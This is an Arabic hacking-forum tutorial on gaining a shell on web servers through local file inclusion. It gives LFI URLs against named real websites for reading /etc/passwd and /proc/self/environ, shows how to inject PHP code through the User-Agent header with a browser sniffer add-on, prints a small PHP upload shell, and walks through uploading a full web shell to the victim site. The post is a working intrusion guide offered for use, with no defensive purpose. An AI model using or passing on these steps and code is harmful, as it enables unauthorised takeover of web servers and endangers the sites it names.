:: vBspiders Professional Network :: - الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

السلام عليكم ورحمة الله وبركاته

موضوعنا اليوم عن الحصول على شل عن طريق ثغرات local file include

طبعا الثغره فعاله ومنتشره فى كتير جدا من السيرفرات

ولو دخلت على اى موقع ثغرات تلقاها اكتر من السكيول

لكن مفيش اهتمام بيها مش عارف ليه مع العلم ان استغلالاتها كتير

وانا كنت فاكر ان الطريقه معروفه لانها قديمه حبتين لكن اكتشفت ان كتير مش عارفينها

عموما نبدأ الشرح وهو سهل جدا لكن محتاج تركيز مش أكتر

الأدوات الأول

1 - متصفح فير فوكس (أكيد عند كله)

2 - إضافة mozilla sniffer

https://addons.mozilla.org/en-US/firefox/addon/176005/

3 - فتح دماغك معايا شويه بس

نبدأ الشرح

ده مثال لموقع مصاب بثغرة lfi

http://www.iowaarboretum.org/index.p.../etc/passwd%00

وده موقع للتطبيق فى حالتنا

http://falalalalights.net/site/index...elf/environ%00

على سبيل المثال لا الحصر

نشوف هنعمل ايه

أول حاجه اعرف ان لما بتطلب ملف بى اتش بى من السيرفر فيه عمليه جديده بتبدأ وبتتحفظ فى ملف /proc خاص بيها (مش مهم)

المهم دلوقت ان السيرفرات بيبقى فيها مجلد بالعنوان ده /proc/self/environ بيحتوى على معلومات عن العمليات الأخيره اللى حصلت

احنا بقى هنعمل ايه

هنحقن المجلد ده بشل بسيط الاوا
وعن طريق الشل البسيط نرفع شل كبير

نشوف ازاى

ده المسار اللى بنجيب منه اليوزرات

http://www.site.com/index.php?option.../etc/passwd%00

وخلى بالك من علامة %00 اللى فى الاخر دى

مهمه جدا

طيب بعد منطلب الملف ده النتيجه هتبقى كده

[http://img405.imageshack.us/img405/6839/28542091.jpg

تمام لحد كده الموقع مصاب وزى الفل

نشوف بقى /proc/self/environ متفعله او لا لانها مش موجوده فى كل السيرفرات

ازاى بقى يا حلو
هنغير /etc/passwd ب /proc/self/environ
http://www.site.com/index.php?option...elf/environ%00

لو كان الناتج زى كده

http://img684.imageshack.us/img684/8953/82396384.jpg

يبقى متفعله وزى الفل

طبعا هتلاقى كلام كتير لكن ده فى اول الصفحه وزى منت شايف محتوى على user_agent وده اهم حاجه دلوقت

طيب لو مظهرش كده وظهر فور بيدن او صفحه بيضه

يبقة كده مش متفعل وشوف سايت تانى بقى او استنى للدرس الجى هتشوف فيه مفاجأه

اوك

لقيناه متفعل هنعمل ايه

نحقن الشل تبعنا فيه وهتشوف ازاى لكن الاول حاول تنقى شل خفيف وانا هستخدم ده
مجرد فورم ابلو مش اكتر نرفع بيه الشل الكبير بتاعنا

كود:

<?php

echo '<b><br><br>'.php_u****().'<br></b>';

echo '<form action="" method="post" enctype="multipart/form-data" ****="uploader" id="uploader">';

echo '<input type="file" ****="file" size="50"><input ****="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

    if(@copy($_FILES['file']['tmp_****'], $_FILES['file']['****'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?>

تم ارفاق الشل

نشوف بقى هنحقنه ازاى

بعد متسطب الاداه mozilla sniffer

تفتحها من الفاير فوكس عن طريق tools > mozilla sniffer

وبعدين تضغط start sniff

طبعا ناس هتقول اداة التامبر بتقضى نفس الغرض

اقولك لو جربت تغبر الاجينت بالتامبر هيديك ايرور ومش هتشتغل لكن السنيفر شغاله بدون مشاكل lol
طيب

ضغطنا start sniff
افتح بقى السايت تانى طبعا السايت ده

http://www.site.com/index.php?option...elf/environ%00

واختار tamper

تلقى جاك حاجه زى دى
http://img717.imageshack.us/img717/5847/54189235.jpg

لاحظ المحدد بازرق اللى هو user agent

حط مكانه كود الشل الموجود فوق

واتكى ok

تمام كده تلاقى الصفحه ظهر فيها فورم رفع
زى ده
http://img3.imageshack.us/img3/6690/66529820.jpg

لول

ارفع الشل تبعك بس وانت مشغل السنيفر برضه متقفلهاش

بعد متضغط ابلود
اضغط tamper تانى وحط نفس الكود اللى حطيته قبل كده اللى هو تبع الرفع
http://img339.imageshack.us/img339/7194/27963690.jpg

واضغط اوك

تمام كده انا رفعت الشل باسم faris.php

تروح بقى على السايت مباشر وتضيف يعدها اسم الشل

توضيح
انا كنت شغال هنا
http://www.site.com/index.php?option...elf/environ%00

يبقى الشل هنا

http://www.site.com/faris.php

والنتيجه

http://img155.imageshack.us/img155/6245/77049477.jpg

مبروووك

lol

انتهى الشرح
اتمنى يكون واضح
وأى استفسارات انا جاهز

HaCKeR-MaN k:

نسخ لصق
-------
ahmed_100022
عالم المعرفه